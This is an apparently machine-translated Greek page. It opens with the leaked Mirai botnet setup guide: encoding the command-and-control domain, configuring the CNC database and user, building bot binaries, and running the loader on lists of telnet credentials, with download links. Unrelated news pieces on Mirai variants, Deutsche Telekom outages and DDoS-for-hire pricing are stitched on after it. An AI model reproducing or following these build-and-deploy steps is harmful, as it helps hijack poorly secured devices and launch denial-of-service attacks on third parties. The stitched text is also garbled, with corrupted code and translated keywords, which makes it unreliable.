Τώρα, στον φάκελο ./mirai/debug θα πρέπει να δείτε ένα μεταγλωττισμένο δυαδικό αρχείο που ονομάζεται enc. Για παράδειγμα, για να λάβετε ασαφή συμβολοσειρά για το όνομα τομέα για σύνδεση με τα bots, χρησιμοποιήστε αυτό:
./debug/enc string fuck.the.police.com
Η έξοδος πρέπει να μοιάζει με αυτό
XOR 20 byte δεδομένων…
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
Για να ενημερώσετε την τιμή TABLE_CNC_DOMAIN, για παράδειγμα, αντικαταστήστε τη μεγάλη δεκαεξαδική συμβολοσειρά με αυτήν που παρέχεται από το εργαλείο enc. Επίσης, βλέπετε το "XOR'ing 20 byte data". Αυτή η τιμή πρέπει να αντικαταστήσει και το τελευταίο όρισμα. Έτσι, για παράδειγμα, η γραμμή table.c αρχικά μοιάζει με αυτό
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //cnc.changeme.com
Τώρα που γνωρίζουμε την αξία από το εργαλείο enc, το ενημερώνουμε ως εξής
add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x2); //fuck.the.police.com
Ορισμένες τιμές είναι συμβολοσειρές, ορισμένες είναι θύρα (uint16 σε σειρά δικτύου / big endian).
ΔΙΑΜΟΡΦΩΣΗ ΤΟ CNC:
apt-get εγκατάσταση mysql-server mysql-client
Το CNC απαιτεί βάση δεδομένων για να λειτουργήσει. Όταν εγκαθιστάτε τη βάση δεδομένων, μεταβείτε σε αυτήν και εκτελέστε τις ακόλουθες εντολές:
http://pastebin.com/86d0iL9g
Αυτό θα δημιουργήσει μια βάση δεδομένων για εσάς. Για να προσθέσετε τον χρήστη σας,
INSERT INTO χρήστες ΤΙΜΕΣ (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
Τώρα, μεταβείτε στο αρχείο ./mirai/cnc/main.go
Επεξεργαστείτε αυτές τις τιμές
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"
Στις πληροφορίες για το διακομιστής mysqlμόλις εγκαταστήσατε
Οι πολλαπλοί μεταγλωττιστές είναι εύκολοι, ακολουθήστε τις οδηγίες σε αυτόν τον σύνδεσμο για να ρυθμίσετε. Πρέπει να επανεκκινήσετε το σύστημά σας ή να φορτώσετε ξανά το αρχείο .bashrc για να τεθούν σε ισχύ αυτές οι αλλαγές.
http://pastebin.com/1rRCc3aD
Το CNC, το bot και τα σχετικά εργαλεία:
http://dopefile.pk/a9f2n9ewk8om
Πώς να δημιουργήσετε bot + CNC
Στο φάκελο mirai, υπάρχει σενάριο build.sh.
./build.sh εντοπισμός σφαλμάτων telnet
Θα παράγει δυαδικά αρχεία εντοπισμού σφαλμάτων του bot που δεν θα δαιμονοποιείται και θα εκτυπώνει πληροφορίες σχετικά με το εάν μπορεί να συνδεθεί σε CNC, κ.λπ., την κατάσταση των πλημμυρών κ.λπ. Μεταγλωττίζεται στον φάκελο ./mirai/debug
./build.sh απελευθέρωση telnet
Θα παράγει δυαδικά bot έτοιμα για παραγωγή που είναι εξαιρετικά απογυμνωμένα, μικρά (περίπου 60K) που θα πρέπει να φορτωθούν σε συσκευές. Μεταγλωττίζει όλα τα δυαδικά αρχεία σε μορφή: "mirai.$ARCH" σε φάκελο ./mirai/release
Το Loader διαβάζει καταχωρήσεις telnet από το STDIN στην ακόλουθη μορφή:
ip:port user:pass
Εντοπίζει αν υπάρχει wget ή tftp και προσπαθεί να κατεβάσει το δυαδικό χρησιμοποιώντας αυτό. Αν όχι, θα επαναφορτώσει ένα μικροσκοπικό δυαδικό (περίπου 1 kb) που θα αρκεί ως wget.
./build.sh
Θα κατασκευάσει τον φορτωτή, βελτιστοποιημένο, χρήση παραγωγής, χωρίς φασαρία. Εάν έχετε ένα αρχείο σε μορφές που χρησιμοποιούνται για φόρτωση, μπορείτε να το κάνετε αυτό
cat file.txt | ./φορτωτής
Θυμηθείτε να περιορίσετε!
Απλώς για να είναι ξεκάθαρο, δεν παρέχω κανενός είδους σεμινάρια βοήθειας 1 προς 1 ή σκατά, πάρα πολύ χρόνο. Όλα τα σενάρια και τα πάντα περιλαμβάνονται για να ρυθμίσετε το botnet εργασίας σε λιγότερο από 1 ώρα. Είμαι πρόθυμος να σας βοηθήσω εάν έχετε μεμονωμένες ερωτήσεις (πώς το CNC δεν συνδέεται με τη βάση δεδομένων, το έκανα αυτό το μπλα μπλα), αλλά όχι ερωτήσεις όπως "Το ρομπότ μου δεν συνδέεται, διορθώστε το"
Αυτός είναι ο Trojan για τον οποίο όλοι γράφουν τις τελευταίες εβδομάδες. Ανάμεσα στα πιο εντυπωσιακά επιτεύγματα των botnets που δημιουργήθηκαν με τη βοήθειά του είναι η χωρητικότητα μεγαλύτερη από ένα terabit και σε μια μικρή αφρικανική χώρα.
Πόσους υπολογιστές σκλάβωσε για αυτό;
Καθόλου. Ή τουλάχιστον πολύ λίγο. Οι συσκευές-στόχοι του Mirai δεν είναι καθόλου υπολογιστές, αλλά συσκευές IoT - βίντεο εγγραφής, κάμερες, τοστιέρες... Σύμφωνα με στατιστικά στοιχεία του Level 3 Communications, μέχρι τα τέλη Οκτωβρίου, περίπου μισό εκατομμύριο συσκευές ήταν ήδη υπό τον έλεγχο του Trojan.
Και τι, μπορεί να πιάσει καμιά κάμερα με ψυγεία;
Όχι πραγματικά. Το Mirai είναι προσαρμοσμένο για συσκευές που εκτελούν Busybox - ένα απλοποιημένο σύνολο βοηθητικών προγραμμάτων UNIX γραμμή εντολών, το οποίο χρησιμοποιείται ως η κύρια διεπαφή στο ενσωματωμένο λειτουργικά συστήματα. Το Trojan επιτίθεται μόνο σε συγκεκριμένες πλατφόρμες, όπως ARM, ARM7, MIPS, PPC, SH4, SPARC και x86. Κινδυνεύουν μόνο συσκευές με εργοστασιακές ρυθμίσεις ή πολύ αδύναμη προστασία - η μόλυνση εμφανίζεται με επίθεση ωμής βίας στη θύρα Telnet, για την οποία χρησιμοποιείται η προεπιλεγμένη λίστα διαπιστευτηρίων διαχειριστή.
Είναι κατά κάποιο τρόπο αναποτελεσματική η αναζήτηση σε ολόκληρο το Διαδίκτυο για κάμερες χωρίς κωδικούς πρόσβασης - έτσι δεν είναι;
Αλλά δεν μάντεψαν σωστά. Ένας δημοσιογράφος από το The Atlantic νοίκιασε έναν διακομιστή και έγραψε ένα πρόγραμμα που προσποιείται ότι είναι τοστιέρα. Η πρώτη επίθεση σε «οικιακή συσκευή» σημειώθηκε μετά από 40 λεπτά! Τις επόμενες 11 ώρες, η τοστιέρα παραβιάστηκε περισσότερες από 300 φορές. Το γεγονός είναι ότι τα botnet έχουν φτάσει σε πρωτοφανή μεγέθη και ο χώρος διευθύνσεων IPv4 για αυτά είναι πολύ μικρός. Επιπλέον, αξίζει να θυμόμαστε ότι οι χάκερ δεν αναζητούν ευάλωτες συσκευές με μη αυτόματο τρόπο - αυτό γίνεται από μέλη του botnet. Και, δεδομένου ότι κάθε νέος «υπάλληλος» που έχει μετατραπεί αρχίζει επίσης να αναζητά θύματα, το botnet αυξάνεται εκθετικά.
Γεωμετρικά; Σε ένα χρόνο λοιπόν, τα botnets θα περιέχουν τρισεκατομμύρια συσκευές;!
Φυσικά όχι 😀 Το γεγονός είναι ότι ο αριθμός των συσκευών IoT είναι πεπερασμένος. Και αυτό είναι ήδη ένα αρκετά πιεστικό πρόβλημα. Ο συγγραφέας του Mirai παραδέχεται ότι ο μέγιστος αριθμός συσκευών στο δίκτυό του ήταν 380 χιλιάδες και μετά από αρκετές επιθέσεις, όταν οι χρήστες και οι πάροχοι άρχισαν να λαμβάνουν προστατευτικά μέτρα, ο αριθμός των συσκευών μειώθηκε στις 300 χιλιάδες και συνεχίζει να μειώνεται.
Αφού ο πηγαίος κώδικας του Mirai έγινε διαθέσιμος στο κοινό, πολλοί και πολλοί χάκερ άρχισαν να τον χρησιμοποιούν. Επί του παρόντος, ο αριθμός των μεγάλων botnet που βασίζονται σε αυτό το Trojan είναι περίπου 52. Αξίζει να διευκρινιστεί ότι κάθε συσκευή μπορεί να ανήκει σε ένα μόνο δίκτυο - αμέσως μετά την καταγραφή μιας συσκευής, το κακόβουλο λογισμικό την προστατεύει από εκ νέου μόλυνση. Η μόνη περίπτωση που μια συσκευή μπορεί να μεταφερθεί σε άλλον «κάτοχο» είναι η επανεκκίνηση της συσκευής. Σύμφωνα με τους ειδικούς, μετά από επανεκκίνηση η συσκευή θα μολυνθεί ξανά μέσα σε 30 δευτερόλεπτα.
Άρα η αποτελεσματικότητα του Mirai μειώνεται;
Ναί. Οι χάκερ αναγκάζονται να πολεμήσουν για περιορισμένο αριθμό πόρων, ο οποίος μειώνεται (λόγω προφυλάξεων) αντί να αυξάνεται. Η κατάσταση περιπλέκεται περαιτέρω από το γεγονός ότι οι χάκερ είναι εξαιρετικά εγωιστές - για παράδειγμα, αφού απλά απενεργοποιήθηκε ένας κύριος διακομιστής εντολών και ελέγχου (C&C) του botnet - τώρα το botnet αποδείχθηκε άχρηστο και άτρωτο σε νέες επιθέσεις. Καθε νέο δίκτυομε βάση το Mirai θα είναι μικρότερο από τα προηγούμενα και θα μπορεί να πραγματοποιεί μόνο επιθέσεις χαμηλής ισχύος. Για παράδειγμα, κατά τις αμερικανικές εκλογές, πραγματοποιήθηκαν αδύναμες επιθέσεις στις ιστοσελίδες Κλίντον και Τραμπ. Δεν προκάλεσαν καμία ζημιά και κανείς δεν τους παρατήρησε καθόλου (εκτός από την εταιρεία που παρακολουθεί συγκεκριμένα τις ενέργειες αυτού του Trojan).
Είναι σαφές. Τι άλλες ενδιαφέρουσες πληροφορίες είναι γνωστές για αυτόν τον Trojan;
Είναι ο διάδοχος ενός άλλου Trojan, ο οποίος είναι γνωστός με τα ονόματα Gafgyt, Lizkebab, BASHLITE, Bash0day, Bashdoor και Torlus. Το τελευταίο είναι γνωστό για το ότι μπορεί να υποτάξει περίπου ένα εκατομμύριο κάμερες web, σύμφωνα με το ίδιο επίπεδο επικοινωνίας 3. Είναι επίσης γνωστό ότι τα περισσότερα botnet δεν χρησιμοποιούν ένα καθαρό αντίγραφο του Mirai, αλλά τις δικές τους, τροποποιημένες εκδόσεις (κάτι αναμενόμενο).
Αλλο ενδιαφέρον γεγονόςείναι ότι οι χρήστες του RuNet βρήκαν στο πηγαίος κώδικας Mirai Russian trace - στο αρχείο cnc/admin.go υπάρχει έξοδος σχολίων στα ρωσικά:
cnc/admin.go: this.conn.Write(byte(“\033))
Από την άλλη, μοιάζει περισσότερο με αστείο - το "έλεγχος των λογαριασμών..." είναι προφανές αντίγραφο (μηχανική μετάφραση;) του "έλεγχος λογαριασμών".
Τον περασμένο μήνα υπήρξαν επιθέσεις σε μεγάλους ιστότοπους όπως Κελάδημαή το Spotify, το οποίο τα απενεργοποίησε προσωρινά. Για αυτό χρησιμοποιήθηκε ένα botnet Μιράι, ενώνοντας 400-500 χιλιάδες συσκευές Internet of Things. Τώρα οι δημοσιογράφοι της Motherboard έμαθαν ότι δύο χάκερ κατάφεραν να πάρουν τον έλεγχο του botnet και να δημιουργήσουν μια νέα έκδοση του - ήδη ενώνει ένα εκατομμύριο συσκευές. Οι συνδρομητές του γερμανικού παρόχου έχουν βιώσει τη δύναμή του Deutsche Telekom, του οποίου το δίκτυο ήταν εκτός λειτουργίας το περασμένο Σαββατοκύριακο.
Κυνήγι για το Mirai
Οι δημοσιογράφοι κατάφεραν να μιλήσουν με έναν από αυτούς τους δύο μυστηριώδεις χάκερ - χρησιμοποιεί το ψευδώνυμο BestBuy. Σε μια κρυπτογραφημένη διαδικτυακή συνομιλία, τους είπε ότι υπήρχε πραγματικός αγώνας μεταξύ των χάκερ για τον έλεγχο του Mirai. Πρόσφατα ανακαλύφθηκε μια ευπάθεια στο λογισμικό της. Η χρήση του, σε συνδυασμό με την ταχύτητά του, θα μπορούσε να επιτρέψει στο BestBuy και τον συνεργάτη του Popopret να πάρουν τον έλεγχο του μεγαλύτερου μέρους του botnet και να προσθέσουν νέες συσκευές σε αυτό.
Προηγουμένως, οι ειδικοί μας μελέτησαν τον κώδικα του botnet Mirai - αποδείχθηκε ότι δεν δημιουργήθηκε ειδικά για συσκευές Internet of Things. Το κακόβουλο λογισμικό αναζητά συσκευές συνδεδεμένες στο δίκτυο με προεπιλεγμένα στοιχεία σύνδεσης και κωδικούς πρόσβασης (admin:admin, root:password, κ.λπ.). Αυτό σημαίνει ότι, θεωρητικά, μπορεί να περιλαμβάνει οποιεσδήποτε συσκευές, συμπεριλαμβανομένων οικιακών υπολογιστών και διακομιστών ή δρομολογητών.
Συσκευές IoT- συνήθως δρομολογητές - περιλαμβάνονται σε Mirai botnetμέχρι να επανεκκινήσει - τότε το σκουλήκι διαγράφεται από τη μνήμη τους. Ωστόσο, το botnet σαρώνει συνεχώς το Διαδίκτυο για ευάλωτες συσκευές, έτσι ώστε μια «θεραπευμένη» συσκευή να μπορεί γρήγορα να γίνει ξανά μέρος του. Υπάρχει μια πραγματική κούρσα μεταξύ των χάκερ για να είναι ο πρώτος που θα μολύνει όσο το δυνατόν περισσότερες συσκευές.
Δεν υπάρχουν πληροφορίες για το πώς οι δημιουργοί του νέου Mirai καταφέρνουν να ξεπεράσουν τους ανταγωνιστές τους. Ωστόσο, είπαν στους δημοσιογράφους ότι χρησιμοποιούν το δικό τους botnet για τη σάρωση δυνητικά ευάλωτων συσκευών, συμπεριλαμβανομένων εκείνων που προηγουμένως ήταν μέρος του botnet.
«Γιατί δεν πρέπει το Mirai να κυνηγήσει το Mirai και να καταβροχθίσει το πρωτότυπο», λέει η BestBuy.
Όχι μόνο ο Μιράι
Ωστόσο, το νέο botnet δεν απορρόφησε μόνο παλιές συσκευές Mirai και νέες με προεπιλεγμένους κωδικούς πρόσβασης. Οι δημιουργοί του χρησιμοποιούν επίσης ευπάθειες 0 ημερών στο υλικολογισμικό των συσκευών IoT. Οι ειδικοί προέβλεπαν προηγουμένως την επικείμενη εμφάνιση τέτοιων «συνδυασμένων» botnets.
Ο αγώνας εναντίον τους γίνεται αισθητά πιο περίπλοκος - εάν για να αντιμετωπίσει το Mirai ο χρήστης της τελικής συσκευής χρειάζεται μόνο να αλλάξει τα στοιχεία σύνδεσης και τον κωδικό πρόσβασης για πρόσβαση σε αυτό, τότε δεν θα μπορέσει να αντιμετωπίσει μόνος του τα τρωτά σημεία του gadget .
DDoS στα 700 Gbps
Οι χάκερ BestBuy και Popopret έχουν αρχίσει να διαφημίζουν τις υπηρεσίες τους - προσφέρουν πρόσβαση στις υπηρεσίες τους νέα έκδοση Mirai, αποστολή ανεπιθύμητων μηνυμάτων μέσω XMPP/Jabber,
Σύμφωνα με τον χάκερ, προσφέρουν στους πελάτες πολλά πακέτα υπηρεσιών. Το φθηνότερο αξίζει $2 000 - για αυτά τα χρήματα οι πελάτες μπορούν να νοικιάσουν από 20.000 έως 25.000κόμβοι botnet για εκκίνηση φρουρών για έως και δύο εβδομάδες, με διάλειμμα δεκαπέντε λεπτών μεταξύ των επιθέσεων. Πίσω $15 000 ή $20 000 Οι πελάτες έχουν τώρα την ευκαιρία να έχουν 600.000 bots να ξεκινούν επιθέσεις δύο ωρών με διαλείμματα 30 ή 15 λεπτών. Στη δεύτερη περίπτωση, η δύναμη επίθεσης θα είναι 700 Gbit/sή περισσότερο.
Προοπτικές
Ασφάλεια Συσκευές IoTείναι συχνά σε αρκετά χαμηλό επίπεδο - αυτό εξηγείται από το γεγονός ότι οι πωλητές συχνά δεν ενδιαφέρονται να εφαρμόσουν πρόσθετα μέτρα ασφάλεια πληροφοριών. Διαφημίζουν την ευκολία χρήσης των προϊόντων τους, αλλά όλα τα πρόσθετα μέτρα ασφαλείας επιβάλλουν περιορισμούς και απαιτούν πόρους.
Όπως αναφέρθηκε παραπάνω, μόνο οι προγραμματιστές τελικών συσκευών ή οι πάροχοι που τις παρέχουν (στην περίπτωση των δρομολογητών) μπορούν να προστατεύσουν τους χρήστες από πιο προηγμένα botnet. Ο γερμανικός πάροχος Deutsche Telekom, που επηρεάστηκε από την επίθεση της νέας έκδοσης του Mirai, έχει ήδη ανακοινώσει ότι θα «επανεξετάσει τις επιχειρηματικές σχέσεις» με προμηθευτές ευάλωτων δρομολογητών Speedport, Εταιρία Αρκαδική.
Τελικά, θα είναι δυνατό να αυξηθεί το επίπεδο ασφάλειας του Διαδικτύου των πραγμάτων μέσω της εισαγωγής αυστηρότερου ελέγχου των συσκευών από την πλευρά των παρόχων, αφενός, και της ανάπτυξης προτύπων και ρυθμιστικής τεκμηρίωσης για το IoT, αφετέρου. . Παρόμοια μέτρα έχουν ήδη ληφθεί σε πολλές χώρες για να διασφαλιστεί η ασφάλεια των αυτοματοποιημένων συστημάτων ελέγχου διεργασιών. Τα πρώτα βήματα προς αυτή την κατεύθυνση έχουν ήδη γίνει - για παράδειγμα, αρκετοί προμηθευτές πληροφορικής δημοσίευσαν ένα έγγραφο τον Σεπτέμβριο με την επωνυμία Η Βιομηχανική διαδικτυακή ασφάλειαΠλαίσιο (IISF)- προτείνει να θεωρηθεί το Διαδίκτυο των πραγμάτων ως μέρος του «βιομηχανικού Διαδικτύου».
Ωστόσο, το ζήτημα απέχει ακόμη πολύ από την οριστική επίλυση και οι χάκερ BestBuy και Popopretμπορεί να αποκτήσει μονοπώλιο σε μεγάλη κλίμακα Επιθέσεις DDoSΣε σύνδεση. Αυτό είναι ένα μάλλον λυπηρό γεγονός, αλλά οι ίδιοι οι χάκερ, κατά τη διάρκεια μιας συνομιλίας με Μητρική πλακέταδήλωσαν ότι οι δραστηριότητές τους θα καθοδηγούνται όχι μόνο από το κέρδος, αλλά και από ηθικές αρχές. Έτσι, η BestBuy είπε ότι δεν θα επιτρέψουν στους πελάτες να επιτεθούν στις διευθύνσεις IP εταιρειών που εργάζονται με υποδομές ζωτικής σημασίας.
